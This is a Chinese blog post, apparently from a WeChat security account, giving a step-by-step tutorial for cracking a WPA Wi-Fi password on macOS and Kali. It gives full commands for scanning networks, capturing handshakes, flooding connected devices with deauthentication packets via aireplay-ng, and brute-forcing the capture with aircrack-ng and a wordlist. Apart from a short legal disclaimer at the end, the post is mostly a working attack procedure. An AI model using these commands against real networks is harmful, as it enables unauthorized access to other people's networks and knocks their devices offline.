大致原理
通过发送断开连接的请求,使得所有连接了目标WI-FI的设备全都断开连接,设备会重新连接,然后监听其中一个设备与WI-FI建立连接时的握手包,其中包含了密码的密闻,然后使用aircrack-ng进行离线破解。
扫描附近SSID
此类工具有很多,例如MAC下的airport、kali自带的airodump-ng等
MAC下airport
执行命令获取附近SSID
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
设置快捷键后变成:
airport -s
Kali下airodump-ng
注:
(1)这个特殊一点需要进行一些设置
(2)要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。
查看网卡信息
看下当前外接的网卡名字:
sudo airmon-ng
或者
ifconfig
注:网卡推荐使用RTL8187 因为平常我们用的很多网卡Kali是不支持的,而支持的网卡里面,这款是性价比比较高的。
开启监听模式
开启监听后,此时网卡名字为wlan0mon
扫描SSID
抓握手包
然后选择一个你要破解的WI-FI,记录下它的BSSID(物理地址)、CH(CHANNEL)- 信道
MAC
注:需要先安装aircrack-ng
brew install aircrack-ng
开始监听
airport en0 sniff 信道
此时WIFI的图标会变成一个黑点:
这个时候终端不会有其他提示:
等待一段时间后(尽量多等几分钟,等的越久抓到包的概率越大),CTRL+C结束
然后会提示抓的包存放位置:
接下来需要确认这个包里是否抓到里握手包(是否包含密码信息):
sudo aircrack-ng /tmp/airportSniffTRT4xj.cap
注:因为同一个信道可能并不止一个WI-FI信号在使用,所以会探测多个WI-FI
如下图,"0handshake"说明没有抓到握手包,这里因为是演示过程,所以没有抓太久。
Kali
sudo airodump-ng -c 信道 --bssid 物理地址 -w ~/ wlan0mon
STATION就是当前正在与WI-FI通信的设备:
然后另外开启一个终端,发送deauth包:
sudo aireplay-ng -0 0 -a WIFI物理地址 -c 用户设备物理地址 wlan0mon
参数 -0 3 表示发送3次,-0 0 表示持续发送。
可以看到被攻击的设备Lost和Frames的次数不断增加:
当抓到握手包后,提示如下:
此时就可以CTRL+C停止探测和发包的操作里。
此时会在当前目录下生成一个.cap的包:
注:默认生成的包名有个“-”后面执行破解的时候会被误认为参数的一部分从而报错,所以先改下名字,例如7.cap
破解握手包密码
MAC
sudo aircrack-ng /tmp/airportSniffnP4T3X.cap -w 字典路径
根据提示输入要破解的WI-FI的序号即可,因为这里我没抓到握手包,所以会提示缺少EAPOL data。
Kali
sudo aircrack-ng /tmp/airportSniffnP4T3X.cap -w 字典路径
然后就开始破解里,当然这里除了需要运气好,还需要对目标足够的了解,能够提前根据目标特点构造字典。
爆破成功后自带结束并显示密码:
因为一般情况下受限于字典,所以会跑一些很大的字典,例如几个G大小的字典,这个就需要较快处理性能的机器,例如可以用台式机来跑。
------------------------------------------------------------------------------
欢迎分享转发。
喜欢的话动动手指点个“关注”和“在看”吧~
(信安随笔)
------------------------------------------------------------------------------
免责声明
本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。
本文始发于微信公众号(信安随笔):MAC&KALI进行WiFi破解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论